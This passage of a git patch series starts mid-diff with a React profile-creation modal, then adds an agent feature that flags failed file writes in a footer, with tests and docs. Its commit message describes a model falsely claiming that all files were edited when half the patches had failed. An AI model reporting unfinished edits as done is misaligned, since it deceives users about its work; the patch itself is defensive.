+import { ChevronDown, Pencil, Plus, Terminal, Trash2, Users, X } from "lucide-react";
 import { H2 } from "@/components/NouiTypography";
 import { api } from "@/lib/api";
 import type { ProfileInfo } from "@/lib/api";
 import { DeleteConfirmDialog } from "@/components/DeleteConfirmDialog";
 import { useToast } from "@/hooks/useToast";
 import { useConfirmDelete } from "@/hooks/useConfirmDelete";
+import { useModalBehavior } from "@/hooks/useModalBehavior";
 import { Toast } from "@/components/Toast";
-import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
+import { Card, CardContent } from "@/components/ui/card";
 import { Badge } from "@nous-research/ui/ui/components/badge";
 import { Button } from "@nous-research/ui/ui/components/button";
 import { Input } from "@/components/ui/input";
 import { Label } from "@/components/ui/label";
+import { Checkbox } from "@/components/ui/checkbox";
 import { useI18n } from "@/i18n";
+import { usePageHeader } from "@/contexts/usePageHeader";
 
 // Mirrors hermes_cli/profiles.py::_PROFILE_ID_RE so we can reject obviously
 // invalid names (uppercase, spaces, …) before round-tripping a doomed POST.
@@ -23,11 +26,18 @@ export default function ProfilesPage() {
   const [loading, setLoading] = useState(true);
   const { toast, showToast } = useToast();
   const { t } = useI18n();
+  const { setEnd } = usePageHeader();
 
-  // Create form
+  // Create modal
+  const [createModalOpen, setCreateModalOpen] = useState(false);
   const [newName, setNewName] = useState("");
   const [cloneFromDefault, setCloneFromDefault] = useState(true);
   const [creating, setCreating] = useState(false);
+  const closeCreateModal = useCallback(() => setCreateModalOpen(false), []);
+  const createModalRef = useModalBehavior({
+    open: createModalOpen,
+    onClose: closeCreateModal,
+  });
 
   // Inline rename state
   const [renamingFrom, setRenamingFrom] = useState<string | null>(null);
@@ -68,6 +78,7 @@ export default function ProfilesPage() {
       await api.createProfile({ name, clone_from_default: cloneFromDefault });
       showToast(`${t.profiles.created}: ${name}`, "success");
       setNewName("");
+      setCreateModalOpen(false);
       load();
     } catch (e) {
       showToast(`${t.status.error}: ${e}`, "error");
@@ -170,6 +181,22 @@ export default function ProfilesPage() {
 
   const pendingName = profileDelete.pendingId;
 
+  // Put "Create" button in page header
+  useLayoutEffect(() => {
+    setEnd(
+      <Button
+        size="sm"
+        onClick={() => setCreateModalOpen(true)}
+      >
+        <Plus className="h-3 w-3" />
+        {t.common.create}
+      </Button>,
+    );
+    return () => {
+      setEnd(null);
+    };
+  }, [setEnd, t.common.create, loading]);
+
   if (loading) {
     return (
       <div className="flex items-center justify-center py-24">
@@ -198,51 +225,75 @@ export default function ProfilesPage() {
         loading={profileDelete.isDeleting}
       />
 
-      {/* Create new profile */}
-      <Card>
-        <CardHeader>
-          <CardTitle className="flex items-center gap-2 text-base">
-            <Plus className="h-4 w-4" />
-            {t.profiles.newProfile}
-          </CardTitle>
-        </CardHeader>
-        <CardContent>
-          <div className="grid gap-4">
-            <div className="grid gap-2">
-              <Label htmlFor="profile-name">{t.profiles.name}</Label>
-              <Input
-                id="profile-name"
-                placeholder={t.profiles.namePlaceholder}
-                value={newName}
-                onChange={(e) => setNewName(e.target.value)}
-                aria-invalid={
-                  newName.trim() !== "" &&
-                  !PROFILE_NAME_RE.test(newName.trim())
-                }
-              />
-              <p className="text-xs text-muted-foreground">
-                {t.profiles.nameRule}
-              </p>
-            </div>
+      {/* Create profile modal */}
+      {createModalOpen && (
+        <div
+          ref={createModalRef}
+          className="fixed inset-0 z-[100] flex items-center justify-center bg-background/85 backdrop-blur-sm p-4"
+          onClick={(e) => e.target === e.currentTarget && setCreateModalOpen(false)}
+          role="dialog"
+          aria-modal="true"
+          aria-labelledby="create-profile-title"
+        >
+          <div className="relative w-full max-w-md border border-border bg-card shadow-2xl flex flex-col">
+            <Button
+              ghost
+              size="icon"
+              onClick={() => setCreateModalOpen(false)}
+              className="absolute right-2 top-2 text-muted-foreground hover:text-foreground"
+              aria-label="Close"
+            >
+              <X />
+            </Button>
 
-            <label className="flex items-center gap-2 text-sm cursor-pointer">
-              <input
-                type="checkbox"
+            <header className="p-5 pb-3 border-b border-border">
+              <h2
+                id="create-profile-title"
+                className="font-display text-base tracking-wider uppercase"
+              >
+                {t.profiles.newProfile}
+              </h2>
+            </header>
+
+            <div className="p-5 grid gap-4">
+              <div className="grid gap-2">
+                <Label htmlFor="profile-name">{t.profiles.name}</Label>
+                <Input
+                  id="profile-name"
+                  autoFocus
+                  placeholder={t.profiles.namePlaceholder}
+                  value={newName}
+                  onChange={(e) => setNewName(e.target.value)}
+                  onKeyDown={(e) => {
+                    if (e.key === "Enter") handleCreate();
+                  }}
+                  aria-invalid={
+                    newName.trim() !== "" &&
+                    !PROFILE_NAME_RE.test(newName.trim())
+                  }
+                />
+                <p className="text-xs text-muted-foreground">
+                  {t.profiles.nameRule}
+                </p>
+              </div>
+
+              <Checkbox
+                id="clone-from-default"
                 checked={cloneFromDefault}
                 onChange={(e) => setCloneFromDefault(e.target.checked)}
+                label={t.profiles.cloneFromDefault}
               />
-              {t.profiles.cloneFromDefault}
-            </label>
 
-            <div>
-              <Button onClick={handleCreate} disabled={creating}>
-                <Plus className="h-3 w-3" />
-                {creating ? t.common.creating : t.common.create}
-              </Button>
+              <div className="flex justify-end">
+                <Button size="sm" onClick={handleCreate} disabled={creating}>
+                  <Plus className="h-3 w-3" />
+                  {creating ? t.common.creating : t.common.create}
+                </Button>
+              </div>
             </div>
           </div>
-        </CardContent>
-      </Card>
+        </div>
+      )}
 
       {/* List */}
       <div className="flex flex-col gap-3">

From c594a2304734b708e7ebc68d4fe2eff1bb57abbc Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 11:54:13 -0700
Subject: [PATCH 12/59] feat(agent): per-turn file-mutation verifier footer
 (#24498)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Detect when write_file / patch calls fail during a turn and are never
superseded by a successful write to the same path.  When the final
text response is delivered, append an advisory footer listing the
files that did NOT change — so models that over-claim 'patched 5 files'
after 4 silent failures can't hide the lie.

Catches the failure mode reported in Ben Eng's llm-wiki session:
grok-4.1-fast issued batches of parallel patches, half failed with
'Could not find old_string', and the agent summarised the turn
claiming every file was edited.  The user had to manually run
'git status' each turn to catch it.

The verifier is a pure post-hoc check on tool results — no new LLM
calls, no synthetic messages injected into history (prompt cache
preserved), no changes to tool argument dispatch.  Per-turn state is
keyed by path; a later successful write to the same path clears the
failure entry so single-file retry recovery is not flagged.

Wired into both _execute_tool_calls_concurrent and
_execute_tool_calls_sequential, so batched parallel patches and one-at-
a-time edits are both covered.  Footer emission happens after the
agent loop exits, before transform_llm_output / post_llm_call plugin
hooks run, so plugins still see (and can modify) the augmented text.

Config: display.file_mutation_verifier (bool, default true) +
HERMES_FILE_MUTATION_VERIFIER env override.

31 unit tests in tests/run_agent/test_file_mutation_verifier.py cover
target extraction (write_file, patch-replace, patch-v4a single and
multi-file), error-preview extraction (JSON .error field and plain
string), per-turn state transitions (first-error-wins on repeated
failure, success supersedes failure), footer rendering (truncation
at 10 entries, user-actionable hint), and env/config precedence.

Companion docs updated: user-guide/configuration.md +
reference/environment-variables.md.
---
 hermes_cli/config.py                          |   8 +
 run_agent.py                                  | 219 +++++++++++++
 .../run_agent/test_file_mutation_verifier.py  | 308 ++++++++++++++++++
 .../docs/reference/environment-variables.md   |   1 +
 website/docs/user-guide/configuration.md      |  16 +
 5 files changed, 552 insertions(+)
 create mode 100644 tests/run_agent/test_file_mutation_verifier.py

diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index d7585dc3010..c7946872bf2 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -917,6 +917,14 @@ DEFAULT_CONFIG = {
         "persistent_output": True,
         "persistent_output_max_lines": 200,
         "inline_diffs": True,     # Show inline diff previews for write actions (write_file, patch, skill_manage)
+        # File-mutation verifier footer.  When true (default), the agent
+        # appends a one-line advisory to its final response whenever a
+        # write_file / patch call failed during the turn and was never
+        # superseded by a successful write to the same path.  This catches
+        # the "batch of parallel patches, half fail, model claims success"
+        # class of over-claim that otherwise forces users to run
+        # `git status` to verify edits landed.  Set false to suppress.
+        "file_mutation_verifier": True,
         "show_cost": False,       # Show $ cost in the status bar (off by default)
         "skin": "default",
         # UI language for static user-facing messages (approval prompts, a
diff --git a/run_agent.py b/run_agent.py
index 973f0d95d72..a8b071c8724 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -347,6 +347,10 @@ _PARALLEL_SAFE_TOOLS = frozenset({
 # File tools can run concurrently when they target independent paths.
 _PATH_SCOPED_TOOLS = frozenset({"read_file", "write_file", "patch"})
 
+# Tools that mutate files on disk.  Used by the per-turn verifier that
+# surfaces silently-failed file edits so the model can't over-claim success.
+_FILE_MUTATING_TOOLS = frozenset({"write_file", "patch"})
+
 # Maximum number of concurrent worker threads for parallel tool execution.
 _MAX_TOOL_WORKERS = 8
 
@@ -524,6 +528,68 @@ def _append_subdir_hint_to_multimodal(value: Dict[str, Any], hint: str) -> None:
         value["text_summary"] = value["text_summary"] + hint
 
 
+def _extract_file_mutation_targets(tool_name: str, args: Dict[str, Any]) -> List[str]:
+    """Return the file paths a ``write_file`` or ``patch`` call is targeting.
+
+    For ``write_file`` and ``patch`` in replace mode this is just ``args["path"]``.
+    For ``patch`` in V4A patch mode we parse the patch content for
+    ``*** Update File:`` / ``*** Add File:`` / ``*** Delete File:`` headers so
+    the verifier can track each file in a multi-file patch separately.
+    """
+    if tool_name not in _FILE_MUTATING_TOOLS:
+        return []
+    if tool_name == "write_file":
+        p = args.get("path")
+        return [str(p)] if p else []
+    # tool_name == "patch"
+    mode = args.get("mode") or "replace"
+    if mode == "replace":
+        p = args.get("path")
+        return [str(p)] if p else []
+    if mode == "patch":
+        body = args.get("patch") or ""
+        if not isinstance(body, str) or not body:
+            return []
+        import re as _re
+        paths: List[str] = []
+        for _m in _re.finditer(
+            r'^\*\*\*\s+(?:Update|Add|Delete)\s+File:\s*(.+)$',
+            body,
+            _re.MULTILINE,
+        ):
+            p = _m.group(1).strip()
+            if p:
+                paths.append(p)
+        return paths
+    return []
+
+
+def _extract_error_preview(result: Any, max_len: int = 180) -> str:
+    """Pull a one-line error summary out of a tool result for footer display."""
+    text = _multimodal_text_summary(result) if result is not None else ""
+    if not isinstance(text, str):
+        try:
+            text = str(text)
+        except Exception:
+            return ""
+    # Try to parse JSON and pull the ``error`` field — tool handlers return
+    # ``{"success": false, "error": "..."}``; raw string wins if parse fails.
+    stripped = text.strip()
+    if stripped.startswith("{"):
+        try:
+            import json as _json
+            data = _json.loads(stripped)
+            if isinstance(data, dict) and isinstance(data.get("error"), str):
+                text = data["error"]
+        except Exception:
+            pass
+    # Collapse whitespace, trim to max_len.
+    text = " ".join(text.split())
+    if len(text) > max_len:
+        text = text[: max_len - 1] + "…"
+    return text
+
+
 def _trajectory_normalize_msg(msg: Dict[str, Any]) -> Dict[str, Any]:
     """Strip image blobs from a message for trajectory saving.
 
@@ -5346,6 +5412,103 @@ class AIAgent:
             self._pending_steer = None
         return text
 
+    def _record_file_mutation_result(
+        self,
+        tool_name: str,
+        args: Dict[str, Any],
+        result: Any,
+        is_error: bool,
+    ) -> None:
+        """Record a ``write_file`` / ``patch`` outcome for the turn-end verifier.
+
+        On failure, store ``{path: {error_preview, tool}}`` entries.  On
+        success, remove any prior failure entries for the same paths (the
+        model recovered within the turn).  Silently no-ops if the per-turn
+        state dict hasn't been initialised yet (e.g. a tool dispatched
+        outside ``run_conversation``).
+        """
+        if tool_name not in _FILE_MUTATING_TOOLS:
+            return
+        state = getattr(self, "_turn_failed_file_mutations", None)
+        if state is None:
+            return
+        targets = _extract_file_mutation_targets(tool_name, args)
+        if not targets:
+            return
+        if is_error:
+            preview = _extract_error_preview(result)
+            for path in targets:
+                # Keep the FIRST error we saw for a given path unless we
+                # later see success.  A repeated failure with a different
+                # message shouldn't silently overwrite the original.
+                if path not in state:
+                    state[path] = {
+                        "tool": tool_name,
+                        "error_preview": preview,
+                    }
+        else:
+            for path in targets:
+                state.pop(path, None)
+
+    def _file_mutation_verifier_enabled(self) -> bool:
+        """Check whether the per-turn file-mutation verifier footer is on.
+
+        Config path: ``display.file_mutation_verifier`` (bool, default True).
+        ``HERMES_FILE_MUTATION_VERIFIER`` env var overrides config.  Exposed
+        as a method so tests can patch a single seam without reaching into
+        the private ``_turn_failed_file_mutations`` state dict.
+        """
+        try:
+            import os as _os
+            env = _os.environ.get("HERMES_FILE_MUTATION_VERIFIER")
+            if env is not None:
+                return env.strip().lower() not in ("0", "false", "no", "off")
+            # Read from the persisted config.yaml so gateway and CLI share
+            # the same setting.  Import lazily to avoid a startup-time cycle.
+            try:
+                from hermes_cli.config import load_config as _load_config
+                _cfg = _load_config() or {}
+            except Exception:
+                _cfg = {}
+            _display = _cfg.get("display") if isinstance(_cfg, dict) else None
+            if isinstance(_display, dict) and "file_mutation_verifier" in _display:
+                return bool(_display.get("file_mutation_verifier"))
+        except Exception:
+            pass
+        return True  # safe default: verifier on
+
+    @staticmethod
+    def _format_file_mutation_failure_footer(failed: Dict[str, Dict[str, Any]]) -> str:
+        """Render the per-turn failed-mutation dict as a user-facing footer.
+
+        Displays up to 10 paths with their first error preview, then a
+        count of any additional failures.  Returns an empty string when
+        the dict is empty so callers can concatenate unconditionally.
+        """
+        if not failed:
+            return ""
+        lines = [
+            "⚠️ File-mutation verifier: "
+            f"{len(failed)} file(s) were NOT modified this turn despite any "
+            "wording above that may suggest otherwise. Run `git status` or "
+            "`read_file` to confirm."
+        ]
+        shown = 0
+        for path, info in failed.items():
+            if shown >= 10:
+                break
+            preview = (info.get("error_preview") or "").strip()
+            tool = info.get("tool") or "patch"
+            if preview:
+                lines.append(f"  • {path} — [{tool}] {preview}")
+            else:
+                lines.append(f"  • {path} — [{tool}] failed")
+            shown += 1
+        remaining = len(failed) - shown
+        if remaining > 0:
+            lines.append(f"  • … and {remaining} more")
+        return "\n".join(lines)
+
     def _apply_pending_steer_to_tool_results(self, messages: list, num_tool_msgs: int) -> None:
         """Append any pending /steer text to the last tool result in this turn.
 
@@ -10872,6 +11035,17 @@ class AIAgent:
                     result_preview = _err_text[:200] if len(_err_text) > 200 else _err_text
                     logger.warning("Tool %s returned error (%.2fs): %s", function_name, tool_duration, result_preview)
 
+                # Track file-mutation outcome for the turn-end verifier.
+                # `blocked` calls never actually ran — don't let a guardrail
+                # block count as either a failure or a success.
+                if not blocked:
+                    try:
+                        self._record_file_mutation_result(
+                            function_name, function_args, function_result, is_error,
+                        )
+                    except Exception as _ver_err:
+                        logging.debug("file-mutation verifier record failed: %s", _ver_err)
+
                 if not blocked and self.tool_progress_callback:
                     try:
                         self.tool_progress_callback(
@@ -11298,6 +11472,18 @@ class AIAgent:
             else:
                 logger.info("tool %s completed (%.2fs, %d chars)", function_name, tool_duration, _result_len)
 
+            # Track file-mutation outcome for the turn-end verifier.  See
+            # the concurrent path for the rationale; both paths must feed
+            # the same state so the footer reflects every tool call in the
+            # turn, not just the parallel ones.
+            if not _execution_blocked:
+                try:
+                    self._record_file_mutation_result(
+                        function_name, function_args, function_result, _is_error_result,
+                    )
+                except Exception as _ver_err:
+                    logging.debug("file-mutation verifier record failed: %s", _ver_err)
+
             if not _execution_blocked and self.tool_progress_callback:
                 try:
                     self.tool_progress_callback(
@@ -11995,6 +12181,14 @@ class AIAgent:
         truncated_response_prefix = ""
         compression_attempts = 0
         _turn_exit_reason = "unknown"  # Diagnostic: why the loop ended
+
+        # Per-turn file-mutation verifier state.  Keyed by resolved path;
+        # each failed ``write_file`` / ``patch`` call records the error
+        # preview.  Later successful writes to the same path remove the
+        # entry (the model recovered).  At end-of-turn, any entries still
+        # present are surfaced in an advisory footer so the model cannot
+        # over-claim success while the file is actually unchanged on disk.
+        self._turn_failed_file_mutations: Dict[str, Dict[str, Any]] = {}
         
         # Record the execution thread so interrupt()/clear_interrupt() can
         # scope the tool-level interrupt signal to THIS agent's thread only.
@@ -15310,6 +15504,31 @@ class AIAgent:
         else:
             logger.info(_diag_msg, *_diag_args)
 
+        # File-mutation verifier footer.
+        # If one or more ``write_file`` / ``patch`` calls failed during this
+        # turn and were never superseded by a successful write to the same
+        # path, append an advisory footer to the assistant response.  This
+        # catches the specific case — reported by Ben Eng (#15524-adjacent)
+        # — where a model issues a batch of parallel patches, half of them
+        # fail with "Could not find old_string", and the model summarises
+        # the turn claiming every file was edited.  The user then has to
+        # manually run ``git status`` to catch the lie.  With this footer
+        # the truth is surfaced on every turn, so over-claiming is
+        # structurally impossible past the model.
+        #
+        # Gate: only applied when a real text response exists for this
+        # turn and the user didn't interrupt.  Empty/interrupted turns
+        # already have other surface text that shouldn't be augmented.
+        if final_response and not interrupted:
+            try:
+                _failed = getattr(self, "_turn_failed_file_mutations", None) or {}
+                if _failed and self._file_mutation_verifier_enabled():
+                    footer = self._format_file_mutation_failure_footer(_failed)
+                    if footer:
+                        final_response = final_response.rstrip() + "\n\n" + footer
+            except Exception as _ver_err:
+                logger.debug("file-mutation verifier footer failed: %s", _ver_err)
+
         # Plugin hook: transform_llm_output
         # Fired once per turn after the tool-calling loop completes.
         # Plugins can transform the LLM's output text before it's returned.
diff --git a/tests/run_agent/test_file_mutation_verifier.py b/tests/run_agent/test_file_mutation_verifier.py
new file mode 100644
index 00000000000..fca002d2314
--- /dev/null
+++ b/tests/run_agent/test_file_mutation_verifier.py
@@ -0,0 +1,308 @@
+"""Tests for the per-turn file-mutation verifier footer.
+
+Covers the three moving pieces:
+
+1. ``_extract_file_mutation_targets`` — pulls file paths from write_file /
+   patch (replace + V4A) tool-call argument dicts.
+2. ``AIAgent._record_file_mutation_result`` — builds the per-turn state
+   dict, removing entries when a later success supersedes an earlier
+   failure for the same path.
+3. ``AIAgent._format_file_mutation_failure_footer`` — renders the dict
+   as a user-visible advisory.
+
+Regression target: the "Ben Eng llm-wiki" session where grok-4.1-fast
+batched parallel patches, half failed, and the model summarised the
+turn claiming every file was edited.  This verifier makes over-claiming
+structurally impossible past the model: the user always sees the real
+list of files that did NOT change.
+"""
+
+from __future__ import annotations
+
+import json
+
+import pytest
+
+from run_agent import (
+    AIAgent,
+    _FILE_MUTATING_TOOLS,
+    _extract_error_preview,
+    _extract_file_mutation_targets,
+)
+
+
+# ---------------------------------------------------------------------------
+# _extract_file_mutation_targets
+# ---------------------------------------------------------------------------
+
+
+class TestExtractFileMutationTargets:
+    def test_non_mutating_tool_returns_empty(self):
+        assert _extract_file_mutation_targets("read_file", {"path": "/x"}) == []
+        assert _extract_file_mutation_targets("terminal", {"command": "ls"}) == []
+
+    def test_write_file_returns_single_path(self):
+        out = _extract_file_mutation_targets("write_file", {"path": "/tmp/a.md", "content": "x"})
+        assert out == ["/tmp/a.md"]
+
+    def test_write_file_missing_path_returns_empty(self):
+        assert _extract_file_mutation_targets("write_file", {"content": "x"}) == []
+
+    def test_patch_replace_mode_returns_path(self):
+        args = {"mode": "replace", "path": "/tmp/a.md", "old_string": "x", "new_string": "y"}
+        assert _extract_file_mutation_targets("patch", args) == ["/tmp/a.md"]
+
+    def test_patch_default_mode_is_replace(self):
+        # Mode omitted — schema default is ``replace``.
+        args = {"path": "/tmp/a.md", "old_string": "x", "new_string": "y"}
+        assert _extract_file_mutation_targets("patch", args) == ["/tmp/a.md"]
+
+    def test_patch_v4a_single_file(self):
+        body = (
+            "*** Begin Patch\n"
+            "*** Update File: /tmp/a.md\n"
+            "@@ ctx @@\n"
+            " line1\n"
+            "-bad\n"
+            "+good\n"
+            "*** End Patch\n"
+        )
+        args = {"mode": "patch", "patch": body}
+        assert _extract_file_mutation_targets("patch", args) == ["/tmp/a.md"]
+
+    def test_patch_v4a_multi_file(self):
+        body = (
+            "*** Begin Patch\n"
+            "*** Update File: /tmp/a.md\n"
+            "@@ @@\n-a\n+b\n"
+            "*** Add File: /tmp/new.md\n"
+            "+fresh\n"
+            "*** Delete File: /tmp/old.md\n"
+            "*** End Patch\n"
+        )
+        args = {"mode": "patch", "patch": body}
+        paths = _extract_file_mutation_targets("patch", args)
+        assert paths == ["/tmp/a.md", "/tmp/new.md", "/tmp/old.md"]
+
+    def test_patch_v4a_missing_body_returns_empty(self):
+        assert _extract_file_mutation_targets("patch", {"mode": "patch"}) == []
+        assert _extract_file_mutation_targets("patch", {"mode": "patch", "patch": ""}) == []
+
+
+# ---------------------------------------------------------------------------
+# _extract_error_preview
+# ---------------------------------------------------------------------------
+
+
+class TestExtractErrorPreview:
+    def test_json_error_field_preferred(self):
+        raw = json.dumps({"success": False, "error": "Could not find old_string in /tmp/x"})
+        assert _extract_error_preview(raw) == "Could not find old_string in /tmp/x"
+
+    def test_plain_string_falls_through(self):
+        assert _extract_error_preview("Error executing tool: boom") == "Error executing tool: boom"
+
+    def test_long_preview_truncated(self):
+        long = "x" * 500
+        out = _extract_error_preview(long, max_len=50)
+        assert len(out) <= 50
+        assert out.endswith("…")
+
+    def test_none_returns_empty(self):
+        assert _extract_error_preview(None) == ""
+
+
+# ---------------------------------------------------------------------------
+# _record_file_mutation_result — state transitions
+# ---------------------------------------------------------------------------
+
+
+def _bare_agent() -> AIAgent:
+    """Skip __init__ and only attach the per-turn state dict.
+
+    AIAgent.__init__ takes ~60 parameters and touches network, auth, and
+    the filesystem.  For these tests we only need the two methods —
+    ``_record_file_mutation_result`` and ``_format_file_mutation_failure_footer``.
+    Using ``object.__new__`` mirrors the gateway-test pattern documented in
+    the agent pitfalls list.
+    """
+    agent = object.__new__(AIAgent)
+    agent._turn_failed_file_mutations = {}
+    return agent
+
+
+class TestRecordFileMutationResult:
+    def test_non_mutating_tool_ignored(self):
+        agent = _bare_agent()
+        agent._record_file_mutation_result(
+            "read_file", {"path": "/tmp/x"}, "{}", is_error=True,
+        )
+        assert agent._turn_failed_file_mutations == {}
+
+    def test_failure_recorded(self):
+        agent = _bare_agent()
+        result = json.dumps({"success": False, "error": "Could not find old_string"})
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md", "old_string": "x", "new_string": "y"},
+            result, is_error=True,
+        )
+        state = agent._turn_failed_file_mutations
+        assert "/tmp/a.md" in state
+        assert state["/tmp/a.md"]["tool"] == "patch"
+        assert "Could not find old_string" in state["/tmp/a.md"]["error_preview"]
+
+    def test_success_removes_prior_failure(self):
+        agent = _bare_agent()
+        # First attempt fails
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md", "old_string": "x", "new_string": "y"},
+            json.dumps({"error": "not found"}), is_error=True,
+        )
+        assert "/tmp/a.md" in agent._turn_failed_file_mutations
+        # Second attempt with corrected old_string succeeds
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md", "old_string": "real", "new_string": "fixed"},
+            json.dumps({"success": True, "diff": "..."}), is_error=False,
+        )
+        assert agent._turn_failed_file_mutations == {}
+
+    def test_repeated_failure_keeps_first_error(self):
+        agent = _bare_agent()
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md", "old_string": "v1", "new_string": "y"},
+            json.dumps({"error": "first error"}), is_error=True,
+        )
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md", "old_string": "v2", "new_string": "y"},
+            json.dumps({"error": "second error"}), is_error=True,
+        )
+        # Keep the original error — swapping to the latest would obscure
+        # the initial root cause.
+        assert "first error" in agent._turn_failed_file_mutations["/tmp/a.md"]["error_preview"]
+
+    def test_v4a_multi_file_all_tracked(self):
+        agent = _bare_agent()
+        body = (
+            "*** Begin Patch\n"
+            "*** Update File: /tmp/a.md\n@@ @@\n-a\n+b\n"
+            "*** Update File: /tmp/b.md\n@@ @@\n-a\n+b\n"
+            "*** End Patch\n"
+        )
+        agent._record_file_mutation_result(
+            "patch", {"mode": "patch", "patch": body},
+            json.dumps({"error": "parse failure"}), is_error=True,
+        )
+        assert set(agent._turn_failed_file_mutations) == {"/tmp/a.md", "/tmp/b.md"}
+
+    def test_no_state_dict_silent_noop(self):
+        """When called outside run_conversation the state dict is absent.
+
+        The record helper must never raise — a tool dispatched from, say,
+        a direct ``chat()`` call should not blow up the call site just
+        because the verifier state hasn't been initialised.
+        """
+        agent = object.__new__(AIAgent)  # no state attached
+        # Should not raise
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace", "path": "/tmp/a.md"},
+            json.dumps({"error": "x"}), is_error=True,
+        )
+
+    def test_missing_path_arg_recorded_nowhere(self):
+        agent = _bare_agent()
+        agent._record_file_mutation_result(
+            "patch", {"mode": "replace"},  # no path
+            json.dumps({"error": "path required"}), is_error=True,
+        )
+        # No path → nothing to key on, state stays empty.  The per-turn
+        # state is about file paths, not individual tool-call IDs.
+        assert agent._turn_failed_file_mutations == {}
+
+
+# ---------------------------------------------------------------------------
+# _format_file_mutation_failure_footer
+# ---------------------------------------------------------------------------
+
+
+class TestFormatFooter:
+    def test_empty_returns_empty_string(self):
+        assert AIAgent._format_file_mutation_failure_footer({}) == ""
+
+    def test_single_failure(self):
+        out = AIAgent._format_file_mutation_failure_footer(
+            {"/tmp/a.md": {"tool": "patch", "error_preview": "Could not find old_string"}},
+        )
+        assert "1 file(s) were NOT modified" in out
+        assert "/tmp/a.md" in out
+        assert "Could not find old_string" in out
+        assert "git status" in out  # user-actionable hint
+
+    def test_truncation_at_10_entries(self):
+        failed = {
+            f"/tmp/f{i}.md": {"tool": "patch", "error_preview": "err"}
+            for i in range(15)
+        }
+        out = AIAgent._format_file_mutation_failure_footer(failed)
+        assert "15 file(s) were NOT modified" in out
+        assert "… and 5 more" in out
+        # Ten file bullets + header + "and X more" line
+        lines = out.split("\n")
+        bullet_lines = [ln for ln in lines if ln.lstrip().startswith("•")]
+        assert len(bullet_lines) == 11  # 10 shown + 1 summary
+
+
+# ---------------------------------------------------------------------------
+# _file_mutation_verifier_enabled — env + config precedence
+# ---------------------------------------------------------------------------
+
+
+class TestVerifierEnabled:
+    def test_default_is_enabled(self, monkeypatch):
+        monkeypatch.delenv("HERMES_FILE_MUTATION_VERIFIER", raising=False)
+        agent = _bare_agent()
+        # With no env and no config present, safe default is True.
+        # load_config may surface a user config.yaml in some envs — stub it.
+        import hermes_cli.config as _cfg_mod
+        monkeypatch.setattr(_cfg_mod, "load_config", lambda: {})
+        assert agent._file_mutation_verifier_enabled() is True
+
+    @pytest.mark.parametrize("value", ["0", "false", "FALSE", "no", "off"])
+    def test_env_disables(self, monkeypatch, value):
+        monkeypatch.setenv("HERMES_FILE_MUTATION_VERIFIER", value)
+        agent = _bare_agent()
+        assert agent._file_mutation_verifier_enabled() is False
+
+    def test_env_enables_over_config(self, monkeypatch):
+        monkeypatch.setenv("HERMES_FILE_MUTATION_VERIFIER", "1")
+        import hermes_cli.config as _cfg_mod
+        monkeypatch.setattr(
+            _cfg_mod, "load_config",
+            lambda: {"display": {"file_mutation_verifier": False}},
+        )
+        agent = _bare_agent()
+        assert agent._file_mutation_verifier_enabled() is True
+
+    def test_config_disables_when_no_env(self, monkeypatch):
+        monkeypatch.delenv("HERMES_FILE_MUTATION_VERIFIER", raising=False)
+        import hermes_cli.config as _cfg_mod
+        monkeypatch.setattr(
+            _cfg_mod, "load_config",
+            lambda: {"display": {"file_mutation_verifier": False}},
+        )
+        agent = _bare_agent()
+        assert agent._file_mutation_verifier_enabled() is False
+
+
+# ---------------------------------------------------------------------------
+# Module-level invariants
+# ---------------------------------------------------------------------------
+
+
+def test_file_mutating_tools_set_shape():
+    """write_file + patch are the only tools the verifier tracks.
+
+    Guard rail: if someone adds a third file-mutating tool (e.g. a new
+    ``append_file``), they should also audit whether the verifier should
+    track it.  This test fails loudly on unilateral additions.
+    """
+    assert _FILE_MUTATING_TOOLS == frozenset({"write_file", "patch"})
diff --git a/website/docs/reference/environment-variables.md b/website/docs/reference/environment-variables.md
index 9d7208883b7..eda0c2863a7 100644
--- a/website/docs/reference/environment-variables.md
+++ b/website/docs/reference/environment-variables.md
@@ -490,6 +490,7 @@ Advanced per-platform knobs for throttling the outbound message batcher. Most us
 | `HERMES_GATEWAY_PLATFORM_CONNECT_TIMEOUT` | Per-platform connect timeout during gateway startup (seconds). |
 | `HERMES_GATEWAY_BUSY_INPUT_MODE` | Default gateway busy-input behavior: `queue`, `steer`, or `interrupt`. Can be overridden per chat with `/busy`. |
 | `HERMES_GATEWAY_BUSY_ACK_ENABLED` | Whether the gateway sends an acknowledgment message (⚡/⏳/⏩) when a user sends input while the agent is busy (default: `true`). Set to `false` to suppress these messages entirely — the input is still queued/steered/interrupts as normal, only the chat reply is silenced. Bridged from `display.busy_ack_enabled` in `config.yaml`. |
+| `HERMES_FILE_MUTATION_VERIFIER` | Enable the per-turn file-mutation verifier footer (default: `true`). When enabled, Hermes appends an advisory listing any `write_file` / `patch` calls that failed during the turn and were not superseded by a successful write. Set to `0`, `false`, `no`, or `off` to suppress. Mirrors `display.file_mutation_verifier` in `config.yaml`; the env var wins when set. |
 | `HERMES_CRON_TIMEOUT` | Inactivity timeout for cron job agent runs in seconds (default: `600`). The agent can run indefinitely while actively calling tools or receiving stream tokens — this only triggers when idle. Set to `0` for unlimited. |
 | `HERMES_CRON_SCRIPT_TIMEOUT` | Timeout for pre-run scripts attached to cron jobs in seconds (default: `120`). Override for scripts that need longer execution (e.g., randomized delays for anti-bot timing). Also configurable via `cron.script_timeout_seconds` in `config.yaml`. |
 | `HERMES_CRON_MAX_PARALLEL` | Max cron jobs run in parallel per tick (default: `4`). |
diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index ed94dfb0ed7..14f80d4d97a 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -1204,9 +1204,25 @@ display:
